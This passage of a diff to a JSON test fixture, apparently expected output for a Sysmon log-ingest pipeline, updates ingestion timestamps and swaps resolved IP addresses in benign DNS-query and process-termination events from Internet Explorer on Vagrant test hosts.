ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.292\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.godaddy.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ocsp.godaddy.com.akadns.net;::ffff:72.167.239.239;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802569800Z'/\u003e\u003cEventRecordID\u003e117\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.292\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.godaddy.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ocsp.godaddy.com.akadns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", @@ -6744,7 +6661,7 @@ ] }, "event": { - "ingested": "2021-06-14T13:23:14.741537Z", + "ingested": "2021-12-09T13:50:23.456922900Z", "code": "22", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802587100Z'/\u003e\u003cEventRecordID\u003e118\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.315\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003egoogleads.g.doubleclick.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e9701\u003c/Data\u003e\u003cData Name='QueryResults'\u003e\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -6818,7 +6735,7 @@ ] }, "event": { - "ingested": "2021-06-14T13:23:14.741545500Z", + "ingested": "2021-12-09T13:50:23.456928900Z", "code": "22", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802678700Z'/\u003e\u003cEventRecordID\u003e119\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.315\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etpc.googlesyndication.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e9701\u003c/Data\u003e\u003cData Name='QueryResults'\u003e\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -6871,7 +6788,7 @@ "level": "information" }, "event": { - "ingested": "2021-06-14T13:23:14.741556300Z", + "ingested": "2021-12-09T13:50:23.456934800Z", "code": "5", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e5\u003c/EventID\u003e\u003cVersion\u003e3\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e5\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:38.981137800Z'/\u003e\u003cEventRecordID\u003e5\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4516'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:38.981\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-cdf4-5c8f-0000-0010e61e2a00}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4616\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Users\\vagrant\\AppData\\Local\\Temp\\Sysmon.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -6935,11 +6852,11 @@ "type": "CNAME" }, { - "data": "151.139.128.14", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -6947,7 +6864,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -6955,7 +6872,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -6963,7 +6880,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -6971,21 +6888,21 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" } ], "resolved_ip": [ - "151.139.128.14", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "network": { @@ -7001,22 +6918,22 @@ "ocsp.usertrust.com" ], "ip": [ - "151.139.128.14", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741562600Z", + "ingested": "2021-12-09T13:50:23.456942400Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802700200Z'/\u003e\u003cEventRecordID\u003e120\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.333\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.usertrust.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t3j2g9x7.stackpathcdn.com;::ffff:151.139.128.14;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802700200Z'/\u003e\u003cEventRecordID\u003e120\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.333\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.usertrust.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t3j2g9x7.stackpathcdn.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", @@ -7084,17 +7001,17 @@ "type": "CNAME" }, { - "data": "23.50.53.179", + "data": "89.160.20.156", "type": "A" }, { - "data": "23.50.53.176", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.50.53.179", - "23.50.53.176" + "89.160.20.156", + "89.160.20.156" ] }, "network": { @@ -7111,14 +7028,13 @@ "isrg.trustid.ocsp.identrust.com" ], "ip": [ - "23.50.53.179", - "23.50.53.176" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741566300Z", + "ingested": "2021-12-09T13:50:23.456948500Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802715400Z'/\u003e\u003cEventRecordID\u003e121\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.343\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eisrg.trustid.ocsp.identrust.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 isrg.trustid.ocsp.identrust.com.edgesuite.net;type: 5 a279.dscq.akamai.net;::ffff:23.50.53.179;::ffff:23.50.53.176;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802715400Z'/\u003e\u003cEventRecordID\u003e121\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.343\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eisrg.trustid.ocsp.identrust.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 isrg.trustid.ocsp.identrust.com.edgesuite.net;type: 5 a279.dscq.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", @@ -7182,12 +7098,12 @@ "type": "CNAME" }, { - "data": "172.217.6.198", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "172.217.6.198" + "89.160.20.156" ] }, "network": { @@ -7203,13 +7119,13 @@ "ad.doubleclick.net" ], "ip": [ - "172.217.6.198" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741572200Z", + "ingested": "2021-12-09T13:50:23.456954300Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802729100Z'/\u003e\u003cEventRecordID\u003e122\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.391\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ead.doubleclick.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 dart.l.doubleclick.net;::ffff:172.217.6.198;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802729100Z'/\u003e\u003cEventRecordID\u003e122\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.391\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ead.doubleclick.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 dart.l.doubleclick.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", @@ -7260,7 +7176,7 @@ "level": "information" }, "event": { - "ingested": "2021-06-14T13:23:14.741578200Z", + "ingested": "2021-12-09T13:50:23.456960100Z", "code": "5", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e5\u003c/EventID\u003e\u003cVersion\u003e3\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e5\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:38.981137800Z'/\u003e\u003cEventRecordID\u003e6\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4516'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:38.981\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-cdf4-5c8f-0000-0010071e2a00}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4648\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Users\\vagrant\\Downloads\\Sysmon.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -7324,11 +7240,11 @@ "type": "CNAME" }, { - "data": "151.139.128.14", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -7336,7 +7252,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -7344,7 +7260,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -7352,7 +7268,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -7360,21 +7276,21 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" } ], "resolved_ip": [ - "151.139.128.14", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "network": { @@ -7390,22 +7306,22 @@ "ocsp.sectigo.com" ], "ip": [ - "151.139.128.14", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741585600Z", + "ingested": "2021-12-09T13:50:23.456966100Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802739000Z'/\u003e\u003cEventRecordID\u003e123\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.393\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.sectigo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t3j2g9x7.stackpathcdn.com;::ffff:151.139.128.14;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802739000Z'/\u003e\u003cEventRecordID\u003e123\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.393\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.sectigo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t3j2g9x7.stackpathcdn.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", @@ -7503,7 +7419,7 @@ "level": "information" }, "event": { - "ingested": "2021-06-14T13:23:14.741594200Z", + "ingested": "2021-12-09T13:50:23.456972Z", "code": "1", "original": "\u003cEvent 